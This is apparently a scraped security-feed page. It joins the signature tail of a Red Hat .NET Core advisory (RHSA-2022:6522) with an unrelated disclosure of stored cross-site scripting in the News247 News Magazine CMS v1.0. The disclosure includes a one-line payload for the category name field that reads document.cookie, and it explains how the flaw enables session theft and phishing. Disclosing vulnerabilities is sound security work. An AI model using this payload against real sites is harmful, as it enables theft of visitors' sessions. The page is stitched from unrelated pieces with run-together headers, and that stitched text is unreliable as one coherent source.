rh-dotnet31-netstandard-targeting-pack-2.1-3.1.423-1.el7_9.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-38013  
https://access.redhat.com/security/updates/classification/#moderate

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBYyInutzjgjWX9erEAQjThg/+MKqPc3jlUrNqUAS1LZhSCO6m0uW0uHeX  
XWJwV1fejIn8e2zo/DigEzqjDtXMAB8hizNNJbZJcubq/3o51WM2MWJOl/At8yIm  
zoAYuPOu+DmKbfWvHWQs/FrUMB4zyNXqmLWOZ1D0A7jf8ua7CJxJOtAdmm78uBFz  
EblFEzpNykOMsfWCvJJJ//NivHPlxiaQsS6P5oBFzlErSwHKFzjNpmpiErw4SA1T  
Z5GZSTpSBTrLKfjS1ZGV1tVAXMifISZbZUqg4NAbra6Zf2gfkyYs2wsRyn3fJ+JH  
o0aVY76ANHu3g98hW/Ng3T0ET9edLGOTAz15X4VX5DuFBqHTQFoKOEaDF/nZsN//  
a3eFpGRr4AQ1w8q+dWE20gzlr7o1w65Q1ltdsgXfqxrehLn1ApXIiWlhyoCWXxiW  
kqvicwdOdjJDK56MeZnFu6CjCGZqnR61WuZjbPqBty/Rkl2rHej4KFL2Q7s0CbQU  
Dh4hFEov9ZL2Qx7pCzYrk9G2RB7ljWfw+9vE4UP2FEiwgCK5qKxbmlkQbggULQxQ  
A6YGpvj/KamjagCktrnRC3BWEw8O1ulJChqR5TnllKt9+yunpKVJaVfOyAJNOVi7  
JHrYj9JN/v2H98dmzNstrgJNDD/ePy0HZARTi/gMc06pPZoncpE+vedXMEJsUplM  
uKQk6IAD4Go=WeAO  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-6522-01

News247 News Magazine version 1.0 suffers from a persistent cross site scripting vulnerability.

    # Exploit Title: News247 - News Magazine (CMS) v1.0 – Stored Cross Site Scripting (XSS) # Exploit Author: Ravinder Verma # Date: Septmeber 14, 2022 # Vendor Homepage: https://www.sourcecodester.com/php/14952/news247-news-magazine-php-script.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/news247.zip # Tested on: Kali Linux, Apache, Mysql # Vendor: 255programmer # Version: v1.0 # CVE [Reserved] : CVE-2021-41731 # Exploit Description:#   News247 - News Magazine (CMS) v1.0 suffers from a stored cross sitescripting (XSS) Vulnerability. Admin can publish blogs under variouscategories. When creating new "blog category", if admin give maliciouspayload like *""><img src=x onerror=alert(document.cookie)>* into thecategory name field and publish that blog. Then it allows you to executearbitrary JavaScript in the context of the whole user who visited thatpage. It can be abused to steal session cookies, perform requests in thename of the victim or for phishing attacks.

Tag

#java